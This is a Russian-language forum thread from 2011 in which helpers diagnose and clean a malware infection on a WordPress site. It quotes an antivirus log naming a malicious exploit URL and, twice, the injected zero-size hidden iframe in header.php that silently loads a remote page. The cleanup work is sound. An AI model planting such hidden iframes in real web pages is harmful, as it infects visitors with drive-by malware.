Помощник
|
С сайта поперли вирусы, помогите избавиться |
kismedia |
9.2.2011, 14:14;
Ответить: kismedia
Сообщение
#22
|
|
Нет, базу пока не надо, давайте с файлами разберемся.
Много плагинов сейчас подключено. Только, я надеюсь Вы поняли что архив директории нужен той которая сейчас на хосте реально, а не Ваша локальная копия. |
|
|
softgaz
|
Сообщение
#23
|
|
Нет, базу пока не надо, давайте с файлами разберемся. Много плагинов сейчас подключено. Только, я надеюсь Вы поняли что архив директории нужен той которая сейчас на хосте реально, а не Ваша локальная копия. Естественно, это понятно: реальные скрипты Нет, базу пока не надо, давайте с файлами разберемся. Много плагинов сейчас подключено. Только, я надеюсь Вы поняли что архив директории нужен той которая сейчас на хосте реально, а не Ваша локальная копия. Отправил - заранее огромнейшее спасибо!!! |
|
|
kismedia |
9.2.2011, 16:53;
Ответить: kismedia
Сообщение
#24
|
|
softgaz, проверил все на наличие распространенных видов, способов подгрузки стороннего кода.
Так же прогнал сайт через несколько сервисов и программ. Ничего подозрительного не нашел. На данный момент у меня антивирус не ругается на Ваш сайт. У Вас есть сейчас сообщения о вирусе, блокировка сайта? |
|
|
kismedia |
9.2.2011, 23:01;
Ответить: kismedia
Сообщение
#25
|
|
softgaz, вчера ,когда Вы начали данную тему у Вас действительно на сайте был вирус.
На данный момент мой антивирус не выдает уже сообщений о вирусе. Возможно, Вы сами еще с утра в результате замены ,обновлении текущей темы удалили его. Либо произвели еще какие-либо действия. Пишите еще раз в Яндекс, 90% что вируса на данный момент нет. |
|
|
sc2r2bey |
9.2.2011, 23:04;
Ответить: sc2r2bey
Сообщение
#26
|
|
есть вирус ты хостеру писал?
-------------------- программирую web и для we |
|
|
kismedia |
9.2.2011, 23:09;
Ответить: kismedia
Сообщение
#27
|
|
|
|
|
kismedia |
9.2.2011, 23:15;
Ответить: kismedia
Сообщение
#28
|
|
Вот собственно лог журнала:
09.02.2011 22:12:46 Фильтр HTTP файл http://ladygaga.ipq.co/games/pdf2.php?f=23 JS/Exploit.Pdfka.OQD троянская программа соединение прервано - изолирован KISMEDIA\Юрий Обнаружена угроза при попытке доступа в Интернет следующим приложением: C:\Program Files\Opera\opera.exe. |
|
|
sc2r2bey |
9.2.2011, 23:24;
Ответить: sc2r2bey
Сообщение
#29
|
|
он самый, может через сервак бьют, писал хостеру?
ну есчо через скрипт могут, надо проверить версию ВП, плагины какие стоят свою машину проверял? -------------------- программирую web и для we |
|
|
kismedia |
10.2.2011, 0:13;
Ответить: kismedia
Сообщение
#30
|
|
Нашел я твой код в исходнике страницы:
<!-- RSS --> <div id="header-rss"><a href="http://www.softgaz.ru/?feed=rss2">Подписка на RSS</a></div> <div id="header-comments"><iframe src="http://ladygaga.ipq.co/index.php?tp=9f58b3191d33ba1b" width="0" height="0" frameborder="0"></iframe><a href="http://www.softgaz.ru/?feed=comments-rss2">Комментарии RSS</a></div> <!-- Categories --> Реально Фрэйм пропустил, пропарил, да и хорошо он вообще замаскирован, вклинился прямо в часть кода, не где-то там сбоку. Правда, архив твоей темы у меня на работе остался, а со своего сервера ты уже его удалил. Можешь сам его найти и убрать. Убрать нужно это: <iframe src="http://ladygaga.ipq.co/index.php?tp=9f58b3191d33ba1b" width="0" height="0" frameborder="0"></iframe> Возможно в файле header.php P.S. Понял почему я его не нашел, по-ходу все-таки подгружается он у тебя динамически в шаблон. То он есть, то его нет. Завтра просканирую еще раз весь твой архив. surfer правильно говорит: он самый, может через сервак бьют, писал хостеру? ну есчо через скрипт могут, надо проверить версию ВП, плагины какие стоят свою машину проверял? Если такая хрень хитрая, прячится еще постоянно, все нужно проверять. Хостеру напиши! |
|
|
softgaz
|
Сообщение
#31
|
|
Нашел я твой код в исходнике страницы: <!-- RSS --> <div id="header-rss"><a href="http://www.softgaz.ru/?feed=rss2">Подписка на RSS</a></div> <div id="header-comments"><iframe src="http://ladygaga.ipq.co/index.php?tp=9f58b3191d33ba1b" width="0" height="0" frameborder="0"></iframe><a href="http://www.softgaz.ru/?feed=comments-rss2">Комментарии RSS</a></div> <!-- Categories --> Реально Фрэйм пропустил, пропарил, да и хорошо он вообще замаскирован, вклинился прямо в часть кода, не где-то там сбоку. Правда, архив твоей темы у меня на работе остался, а со своего сервера ты уже его удалил. Можешь сам его найти и убрать. Убрать нужно это: <iframe src="http://ladygaga.ipq.co/index.php?tp=9f58b3191d33ba1b" width="0" height="0" frameborder="0"></iframe> Возможно в файле header.php P.S. Понял почему я его не нашел, по-ходу все-таки подгружается он у тебя динамически в шаблон. То он есть, то его нет. Завтра просканирую еще раз весь твой архив. surfer правильно говорит: Если такая хрень хитрая, прячится еще постоянно, все нужно проверять. Хостеру напиши! Мужики, просто не знаю, как вас благодарить! Но кода вируса в РНР я не нашел! Поэтому просто убрал эту строчку в header.php Но по всему получается, что этот вирус сидит в базе... |
|
|
|
Похожие темы
Тема | Ответов | Автор | Просмотров | Последний ответ | |
---|---|---|---|---|---|
Какой % отказов нормален для сайта? | 11 | Aloof | 2794 | 16.4.2024, 12:48 автор: diviner99 |
|
Быстрая индексация страниц сайта и обратных ссылок - 2Index | 37 | 2Index | 6585 | 15.4.2024, 16:17 автор: 2Index |
|
SiteAnalyzer - бесплатная программа для аудита и анализа сайта | 77 | Chaser | 74202 | 9.4.2024, 11:36 автор: Chaser |
|
Нужен кодер, чтобы пофиксить ошибку Wordpress после переноса сайта | 0 | Alex-777 | 810 | 7.4.2024, 18:05 автор: Alex-777 |
|
Продвижение молодого сайта | 30 | maxmer | 6569 | 26.3.2024, 21:49 автор: c4p1t4l15t |
Текстовая версия | Сейчас: 18.4.2024, 6:55 |